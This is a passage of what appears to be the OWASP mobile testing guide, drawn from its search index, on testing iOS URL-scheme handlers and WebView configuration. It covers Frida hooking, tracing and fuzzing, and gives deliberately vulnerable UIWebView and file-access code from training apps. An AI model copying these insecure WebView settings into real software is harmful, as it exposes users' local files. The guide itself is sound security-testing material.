func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, open url: URL, sourceApplication: String?,\nannotation: Any) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ app: UIApplication, open url: URL,\noptions: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool {\n self.openUrl(url: url)\n return true\n}\n\nfunc application(_ application: UIApplication, handleOpen url: URL) -> Bool {\n self.openUrl(url: url)\n return true\n}\n
We can observe some things here:
application:handleOpenURL:
and application:openURL:sourceApplication:annotation:
.openUrl
method. You can inspect it to learn more about how the URL request is handled.The method openURL:options:completionHandler:
and the deprecated openURL:
method of UIApplication
are responsible for opening URLs (i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
Additionally, if you are interested into knowing if the app is querying specific services or apps, and if the app is well-known, you can also search for common URL schemes online and include them in your greps. For example, a quick Google search reveals:
Apple Music - music:// or musics:// or audio-player-event://\nCalendar - calshow:// or x-apple-calevent://\nContacts - contacts://\nDiagnostics - diagnostics:// or diags://\nGarageBand - garageband://\niBooks - ibooks:// or itms-books:// or itms-bookss://\nMail - message:// or mailto://emailaddress\nMessages - sms://phonenumber\nNotes - mobilenotes://\n...\n
We search for this method in the Telegram source code, this time without using Xcode, just with egrep
:
$ egrep -nr \"open.*options.*completionHandler\" ./Telegram-iOS/\n\n./AppDelegate.swift:552: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n./AppDelegate.swift:556: return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in\n
If we inspect the results we will see that openURL:options:completionHandler:
is actually being used for universal links, so we have to keep searching. For example, we can search for openURL(
:
$ egrep -nr \"openURL\\(\" ./Telegram-iOS/\n\n./ApplicationContext.swift:763: UIApplication.shared.openURL(parsedUrl)\n./ApplicationContext.swift:792: UIApplication.shared.openURL(URL(\n string: \"https://telegram.org/deactivate?phone=\\(phone)\")!\n )\n./AppDelegate.swift:423: UIApplication.shared.openURL(url)\n./AppDelegate.swift:538: UIApplication.shared.openURL(parsedUrl)\n...\n
If we inspect those lines we will see how this method is also being used to open \"Settings\" or to open the \"App Store Page\".
When just searching for ://
we see:
if documentUri.hasPrefix(\"file://\"), let path = URL(string: documentUri)?.path {\nif !url.hasPrefix(\"mt-encrypted-file://?\") {\nguard let dict = TGStringUtils.argumentDictionary(inUrlString: String(url[url.index(url.startIndex,\n offsetBy: \"mt-encrypted-file://?\".count)...])) else {\nparsedUrl = URL(string: \"https://\\(url)\")\nif let url = URL(string: \"itms-apps://itunes.apple.com/app/id\\(appStoreId)\") {\n} else if let url = url as? String, url.lowercased().hasPrefix(\"tg://\") {\n[[WKExtension sharedExtension] openSystemURL:[NSURL URLWithString:[NSString\n stringWithFormat:@\"tel://%@\", userHandle.data]]];\n
After combining the results of both searches and carefully inspecting the source code we find the following piece of code:
openUrl: { url in\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n if parsed.scheme == \"tg\" {\n return\n }\n }\n\n if let parsedUrl = parsedUrl {\n UIApplication.shared.openURL(parsedUrl)\n
Before opening a URL, the scheme is validated, \"https\" will be added if necessary and it won't open any URL with the \"tg\" scheme. When ready it will use the deprecated openURL
method.
If only having the compiled application (IPA) you can still try to identify which URL schemes are being used to query other apps:
LSApplicationQueriesSchemes
was declared or search for common URL schemes.://
or build a regular expression to match URLs as the app might not be declaring some schemes.You can do that by first verifying that the app binary contains those strings by e.g. using unix strings
command:
strings <yourapp> | grep \"someURLscheme://\"\n
or even better, use radare2's iz/izz
command or rafind2, both will find strings where the unix strings
command won't. Example from iGoat-Swift:
$ r2 -qc izz~iGoat:// iGoat-Swift\n37436 0x001ee610 0x001ee610 23 24 (4.__TEXT.__cstring) ascii iGoat://?contactNumber=\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
For example, here we find those three:
$ rabin2 -zzq Telegram\\ X.app/Telegram\\ X | grep -i \"openurl\"\n\n0x1000d9e90 31 30 UIApplicationOpenURLOptionsKey\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000dee8e 27 26 application:handleOpenURL:\n0x1000df2c9 9 8 openURL:\n0x1000df766 12 11 canOpenURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamic-analysis","title":"Dynamic Analysis","text":"Once you've identified the custom URL schemes the app has registered, there are several methods that you can use to test them:
To quickly test one URL scheme you can open the URLs on Safari and observe how the app behaves. For example, if you write tel://123456789
in the address bar of Safari, a pop up will appear with the telephone number and the options \"Cancel\" and \"Call\". If you press \"Call\" it will open the Phone app and directly make the call.
You may also know already about pages that trigger custom URL schemes, you can just navigate normally to those pages and Safari will automatically ask when it finds a custom URL scheme.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-the-notes-app","title":"Using the Notes App","text":"As already seen in \"Triggering Universal Links\", you may use the Notes app and long press the links you've written in order to test custom URL schemes. Remember to exit the editing mode in order to be able to open them. Note that you can click or long press links including custom URL schemes only if the app is installed, if not they won't be highlighted as clickable links.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida","title":"Using Frida","text":"If you simply want to open the URL scheme you can do it using Frida:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n[iPhone::iGoat-Swift]-> openURL(\"tel://234234234\")\ntrue\n
In this example from Frida CodeShare the author uses the non-public API LSApplicationWorkspace.openSensitiveURL:withOptions:
to open the URLs (from the SpringBoard app):
function openURL(url) {\n var w = ObjC.classes.LSApplicationWorkspace.defaultWorkspace();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return w.openSensitiveURL_withOptions_(toOpen, null);\n}\n
Note that the use of non-public APIs is not permitted on the App Store, that's why we don't even test these but we are allowed to use them for our dynamic analysis.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#identifying-and-hooking-the-url-handler-method","title":"Identifying and Hooking the URL Handler Method","text":"If you can't look into the original source code you will have to find out yourself which method does the app use to handle the URL scheme requests that it receives. You cannot know if it is an Objective-C method or a Swift one, or even if the app is using a deprecated one.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#crafting-the-link-yourself-and-letting-safari-open-it","title":"Crafting the Link Yourself and Letting Safari Open It","text":"For this we will use the ObjC method observer from Frida CodeShare, which is an extremely handy script that allows you to quickly observe any collection of methods or classes just by providing a simple pattern.
In this case we are interested into all methods containing \"openURL\", therefore our pattern will be *[* *openURL*]
:
-
and class +
methods.openURL
.$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\nObserving -[_UIDICActivityItemProvider activityViewController:openURLAnnotationForActivityType:]\nObserving -[CNQuickActionsManager _openURL:]\nObserving -[SUClientController openURL:]\nObserving -[SUClientController openURL:inClientWithIdentifier:]\nObserving -[FBSSystemService openURL:application:options:clientPort:withResult:]\nObserving -[iGoat_Swift.AppDelegate application:openURL:options:]\nObserving -[PrefsUILinkLabel openURL:]\nObserving -[UIApplication openURL:]\nObserving -[UIApplication _openURL:]\nObserving -[UIApplication openURL:options:completionHandler:]\nObserving -[UIApplication openURL:withCompletionHandler:]\nObserving -[UIApplication _openURL:originatingView:completionHandler:]\nObserving -[SUApplication application:openURL:sourceApplication:annotation:]\n...\n
The list is very long and includes the methods we have already mentioned. If we trigger now one URL scheme, for example \"igoat://\" from Safari and accept to open it in the app we will see the following:
[iPhone::iGoat-Swift]-> (0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: igoat://\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\n0x1817e1048 libdispatch.dylib!_dispatch_client_callout\n0x1817e86c8 libdispatch.dylib!_dispatch_block_invoke_direct$VARIANT$mp\n0x18453d9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\n0x18453d698 FrontBoardServices!-[FBSSerialQueue _performNext]\nRET: 0x1\n
Now we know that:
-[iGoat_Swift.AppDelegate application:openURL:options:]
gets called. As we have seen before, it is the recommended way and it is not deprecated.igoat://
.com.apple.mobilesafari
.-[UIApplication _applicationOpenURLAction:payload:origin:]
.0x1
which means YES
(the delegate successfully handled the request).The call was successful and we see now that the iGoat app was open:
Notice that we can also see that the caller (source application) was Safari if we look in the upper-left corner of the screenshot.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#dynamically-opening-the-link-from-the-app-itself","title":"Dynamically Opening the Link from the App Itself","text":"It is also interesting to see which other methods get called on the way. To change the result a little bit we will call the same URL scheme from the iGoat app itself. We will use again ObjC method observer and the Frida REPL:
$ frida -U iGoat-Swift --codeshare mrmacete/objc-method-observer\n\n[iPhone::iGoat-Swift]-> function openURL(url) {\n var UIApplication = ObjC.classes.UIApplication.sharedApplication();\n var toOpen = ObjC.classes.NSURL.URLWithString_(url);\n return UIApplication.openURL_(toOpen);\n }\n\n[iPhone::iGoat-Swift]-> observeSomething(\"*[* *openURL*]\");\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\n\n(0x1c409e460) -[__NSXPCInterfaceProxy__LSDOpenProtocol openURL:options:completionHandler:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: nil\ncompletionHandler: <__NSStackBlock__: 0x16fc89c38>\n0x183befbec MobileCoreServices!-[LSApplicationWorkspace openURL:withOptions:error:]\n0x10ba6400c\n...\nRET: nil\n\n...\n\n(0x101d0fad0) -[UIApplication openURL:]\nopenURL: iGoat://?contactNumber=123456789&message=hola\n0x10a610044\n...\nRET: 0x1\n\ntrue\n(0x1c4038280) -[iGoat_Swift.AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101d0fad0>\nopenURL: iGoat://?contactNumber=123456789&message=hola\noptions: {\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"OWASP.iGoat-Swift\";\n}\n0x18b5030d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n0x18b502a94 UIKit!-[UIApplication _applicationOpenURLAction:payload:origin:]\n...\nRET: 0x1\n
The output is truncated for better readability. This time you see that UIApplicationOpenURLOptionsSourceApplicationKey
has changed to OWASP.iGoat-Swift
, which makes sense. In addition, a long list of openURL
-like methods were called. This information can be very useful for some scenarios as it will help you to decide what your next steps will be, e.g. which method you will hook or tamper with next.
You can now test the same situation when clicking on a link contained on a page. Safari will identify and process the URL scheme and choose which action to execute. Opening this link \"https://telegram.me/fridadotre\" will trigger this behavior.
First of all we let frida-trace generate the stubs for us:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n...\n7310 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n7311 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n7312 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14Open\n URLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF()\n
Now we can simply modify by hand the stubs we are interested in:
The Objective-C method application:openURL:options:
:
// __handlers__/__AppDelegate_application_openUR_3679fadc.js\n\nonEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] +\n \" openURL: \" + args[3] + \" options: \" + args[4] + \"]\");\n log(\"\\tapplication :\" + ObjC.Object(args[2]).toString());\n log(\"\\topenURL :\" + ObjC.Object(args[3]).toString());\n log(\"\\toptions :\" + ObjC.Object(args[4]).toString());\n},\n
The Swift method $S10TelegramUI15openExternalUrl...
:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\nonEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account, url, presentationData,\" +\n \"applicationContext, navigationController, dismissInput)\");\n log(\"\\taccount: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n},\n
The next time we run it, we see the following output:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n -m \"*[* *application*URL*]\" -m \"*[* openURL]\"\n\n 8144 ms -[UIApplication _applicationOpenURLAction: 0x1c44ff900 payload: 0x10c5ee4c0 origin: 0x0]\n 8145 ms | -[AppDelegate application: 0x105a59980 openURL: 0x1c46ebb80 options: 0x1c0e222c0]\n 8145 ms | application: <Application: 0x105a59980>\n 8145 ms | openURL: tg://resolve?domain=fridadotre\n 8145 ms | options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n }\n 8269 ms | | TelegramUI.openExternalUrl(account, url, presentationData,\n applicationContext, navigationController, dismissInput)\n 8269 ms | | account: nil\n 8269 ms | | url: tg://resolve?domain=fridadotre\n 8269 ms | | presentationData: 0x1c4c51741\n 8269 ms | | applicationContext: nil\n 8269 ms | | navigationController: TelegramUI.PresentationData\n 8274 ms | -[UIApplication applicationOpenURL:0x1c46ebb80]\n
There you can observe the following:
application:openURL:options:
from the app delegate as expected.application:openURL:options:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.tg://resolve?domain=fridadotre
.tg://
custom URL scheme from Telegram.It is interesting to see that if you navigate again to \"https://telegram.me/fridadotre\", click on cancel and then click on the link offered by the page itself (\"Open in the Telegram app\"), instead of opening via custom URL scheme it will open via universal links.
You can try this while tracing both methods:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -m \"*[* *application*openURL*options*]\"\n\n// After clicking \"Open\" on the pop-up\n\n 16374 ms -[AppDelegate application :0x10556b3c0 openURL :0x1c4ae0080 options :0x1c7a28400]\n 16374 ms application :<Application: 0x10556b3c0>\n 16374 ms openURL :tg://resolve?domain=fridadotre\n 16374 ms options :{\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.mobilesafari\";\n}\n\n// After clicking \"Cancel\" on the pop-up and \"OPEN\" in the page\n\n406575 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c063d0c0\n restorationHandler:0x16f27a898]\n406575 ms application:<Application: 0x10556b3c0>\n406575 ms continueUserActivity:<NSUserActivity: 0x1c063d0c0>\n406575 ms webpageURL:https://telegram.me/fridadotre\n406575 ms activityType:NSUserActivityTypeBrowsingWeb\n406575 ms userInfo:{\n}\n406575 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-for-deprecated-methods_1","title":"Testing for Deprecated Methods","text":"Search for deprecated methods like:
application:handleOpenURL:
openURL:
application:openURL:sourceApplication:annotation:
You may simply use frida-trace for this, to see if any of those methods are being used.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-schemes-source-validation","title":"Testing URL Schemes Source Validation","text":"A way to discard or confirm validation could be by hooking typical methods that might be used for that. For example isEqualToString:
:
// - (BOOL)isEqualToString:(NSString *)aString;\n\nvar isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\nInterceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n});\n
If we apply this hook and call the URL scheme again:
$ frida -U iGoat-Swift\n\n[iPhone::iGoat-Swift]-> var isEqualToString = ObjC.classes.NSString[\"- isEqualToString:\"];\n\n Interceptor.attach(isEqualToString.implementation, {\n onEnter: function(args) {\n var message = ObjC.Object(args[2]);\n console.log(message)\n }\n });\n{}\n[iPhone::iGoat-Swift]-> openURL(\"iGoat://?contactNumber=123456789&message=hola\")\ntrue\nnil\n
Nothing happens. This tells us already that this method is not being used for that as we cannot find any app-package-looking string like OWASP.iGoat-Swift
or com.apple.mobilesafari
between the hook and the text of the tweet. However, consider that we are just probing one method, the app might be using another approach for the comparison.
If the app parses parts of the URL, you can also perform input fuzzing to detect memory corruption bugs.
What we have learned above can now be used to build your own fuzzer in the language of your choice, e.g. in Python and call the openURL
using Frida's RPC. That fuzzer should do the following:
openURL
..ips
) in /private/var/mobile/Library/Logs/CrashReporter
.The FuzzDB project offers fuzzing dictionaries that you can use as payloads.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#using-frida_1","title":"Using Frida","text":"Doing this with Frida is pretty easy, as explained in this blog post to see an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
Before running the fuzzer we need the URL schemes as inputs. From the static analysis we know that the iGoat-Swift app supports the following URL scheme and parameters: iGoat://?contactNumber={0}&message={0}
.
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js\n[iPhone::SpringBoard]-> fuzz(\"iGoat\", \"iGoat://?contactNumber={0}&message={0}\")\nWatching for crashes from iGoat...\nNo logs were moved.\nOpened URL: iGoat://?contactNumber=0&message=0\nOK!\nOpened URL: iGoat://?contactNumber=1&message=1\nOK!\nOpened URL: iGoat://?contactNumber=-1&message=-1\nOK!\nOpened URL: iGoat://?contactNumber=null&message=null\nOK!\nOpened URL: iGoat://?contactNumber=nil&message=nil\nOK!\nOpened URL: iGoat://?contactNumber=99999999999999999999999999999999999\n&message=99999999999999999999999999999999999\nOK!\nOpened URL: iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: 
iGoat://?contactNumber=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\n&message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n...\nOK!\nOpened URL: iGoat://?contactNumber='&message='\nOK!\nOpened URL: iGoat://?contactNumber=%20d&message=%20d\nOK!\nOpened URL: iGoat://?contactNumber=%20n&message=%20n\nOK!\nOpened URL: iGoat://?contactNumber=%20x&message=%20x\nOK!\nOpened URL: iGoat://?contactNumber=%20s&message=%20s\nOK!\n
The script will detect if a crash occurred. On this run it did not detect any crashes but for other apps this could be the case. We would be able to inspect the crash reports in /private/var/mobile/Library/Logs/CrashReporter
or in /tmp
if it was moved by the script.
For the static analysis we will focus mostly on the following points having UIWebView
and WKWebView
under scope.
Look out for usages of the above mentioned WebView classes by searching in Xcode.
In the compiled binary you can search in its symbols or strings like this:
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#uiwebview","title":"UIWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"UIWebView$\"\n489 0x0002fee9 0x10002fee9 9 10 (5.__TEXT.__cstring) ascii UIWebView\n896 0x0003c813 0x0003c813 24 25 () ascii @_OBJC_CLASS_$_UIWebView\n1754 0x00059599 0x00059599 23 24 () ascii _OBJC_CLASS_$_UIWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0076/#wkwebview","title":"WKWebView","text":"$ rabin2 -zz ./WheresMyBrowser | egrep \"WKWebView$\"\n490 0x0002fef3 0x10002fef3 9 10 (5.__TEXT.__cstring) ascii WKWebView\n625 0x00031670 0x100031670 17 18 (5.__TEXT.__cstring) ascii unwindToWKWebView\n904 0x0003c960 0x0003c960 24 25 () ascii @_OBJC_CLASS_$_WKWebView\n1757 0x000595e4 0x000595e4 23 24 () ascii _OBJC_CLASS_$_WKWebView\n
Alternatively you can also search for known methods of these WebView classes. For example, search for the method used to initialize a WKWebView (init(frame:configuration:)
):
$ rabin2 -zzq ./WheresMyBrowser | egrep \"WKWebView.*frame\"\n0x5c3ac 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x5d97a 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n0x6b5d5 77 76 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfC\n0x6c3fa 79 78 __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n
You can also demangle it:
$ xcrun swift-demangle __T0So9WKWebViewCABSC6CGRectV5frame_So0aB13ConfigurationC13configurationtcfcTO\n\n---> @nonobjc __C.WKWebView.init(frame: __C_Synthesized.CGRect,\n configuration: __C.WKWebViewConfiguration) -> __C.WKWebView\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/","title":"Testing WebView Protocol Handlers","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#static-analysis","title":"Static Analysis","text":"If a WebView is loading content from the app data directory, users should not be able to change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
This presents an issue especially in UIWebView
s loading untrusted content via the deprecated methods loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName:baseURL:
and setting the baseURL
parameter to nil
or to a file:
or applewebdata:
URL schemes. In this case, in order to prevent unauthorized access to local files, the best option is to set it instead to about:blank
. However, the recommendation is to avoid the use of UIWebView
s and switch to WKWebView
s instead.
Here's an example of a vulnerable UIWebView
from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/UIWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n uiWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
The page loads resources from the internet using HTTP, enabling a potential MITM to exfiltrate secrets contained in local files, e.g. in shared preferences.
When working with WKWebView
s, Apple recommends using loadHTMLString:baseURL:
or loadData:MIMEType:textEncodingName:baseURL:
to load local HTML files and loadRequest:
for web content. Typically, the local files are loaded in combination with methods including, among others: pathForResource:ofType:
, URLForResource:withExtension:
or init(contentsOf:encoding:)
.
Search the source code for the mentioned methods and inspect their parameters.
Example in Objective-C:
- (void)viewDidLoad\n{\n [super viewDidLoad];\n WKWebViewConfiguration *configuration = [[WKWebViewConfiguration alloc] init];\n\n self.webView = [[WKWebView alloc] initWithFrame:CGRectMake(10, 20,\n CGRectGetWidth([UIScreen mainScreen].bounds) - 20,\n CGRectGetHeight([UIScreen mainScreen].bounds) - 84) configuration:configuration];\n self.webView.navigationDelegate = self;\n [self.view addSubview:self.webView];\n\n NSString *filePath = [[NSBundle mainBundle] pathForResource:@\"example_file\" ofType:@\"html\"];\n NSString *html = [NSString stringWithContentsOfFile:filePath\n encoding:NSUTF8StringEncoding error:nil];\n [self.webView loadHTMLString:html baseURL:[NSBundle mainBundle].resourceURL];\n}\n
Example in Swift from \"Where's My Browser?\":
let scenario2HtmlPath = Bundle.main.url(forResource: \"web/WKWebView/scenario2.html\", withExtension: nil)\ndo {\n let scenario2Html = try String(contentsOf: scenario2HtmlPath!, encoding: .utf8)\n wkWebView.loadHTMLString(scenario2Html, baseURL: nil)\n} catch {}\n
If only having the compiled binary, you can also search for these methods, e.g.:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadHTMLString\"\n231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:\n
In a case like this, it is recommended to perform dynamic analysis to ensure that this is in fact being used and from which kind of WebView. The baseURL
parameter here doesn't present an issue as it will be set to \"null\" but could be an issue if not set properly when using a UIWebView
. See \"Checking How WebViews are Loaded\" for an example about this.
In addition, you should also verify if the app is using the method loadFileURL:allowingReadAccessToURL:
. Its first parameter is URL
and contains the URL to be loaded in the WebView, its second parameter allowingReadAccessToURL
may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that directory will be made available to the WebView. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it.
Example in Swift from \"Where's My Browser?\":
var scenario1Url = FileManager.default.urls(for: .libraryDirectory, in: .userDomainMask)[0]\nscenario1Url = scenario1Url.appendingPathComponent(\"WKWebView/scenario1.html\")\nwkWebView.loadFileURL(scenario1Url, allowingReadAccessTo: scenario1Url)\n
In this case, the parameter allowingReadAccessToURL
contains a single file \"WKWebView/scenario1.html\", meaning that the WebView has exclusively access to that file.
In the compiled binary:
$ rabin2 -zz ./WheresMyBrowser | grep -i \"loadFileURL\"\n237 0x0002dff1 37 (4.__TEXT.__objc_methname) ascii loadFileURL:allowingReadAccessToURL:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#testing-webview-file-access","title":"Testing WebView File Access","text":"If you have found a UIWebView
being used, then the following applies:
file://
scheme is always enabled.file://
URLs is always enabled.file://
URLs is always enabled.Regarding WKWebView
s:
file://
scheme is also always enabled and it cannot be disabled.file://
URLs by default but it can be enabled.The following WebView properties can be used to configure file access:
allowFileAccessFromFileURLs
(WKPreferences
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from other file://
scheme URLs.allowUniversalAccessFromFileURLs
(WKWebViewConfiguration
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from any origin.For example, it is possible to set the undocumented property allowFileAccessFromFileURLs
by doing this:
Objective-C:
[webView.configuration.preferences setValue:@YES forKey:@\"allowFileAccessFromFileURLs\"];\n
Swift:
webView.configuration.preferences.setValue(true, forKey: \"allowFileAccessFromFileURLs\")\n
If one or more of the above properties are activated, you should determine whether they are really necessary for the app to work properly.
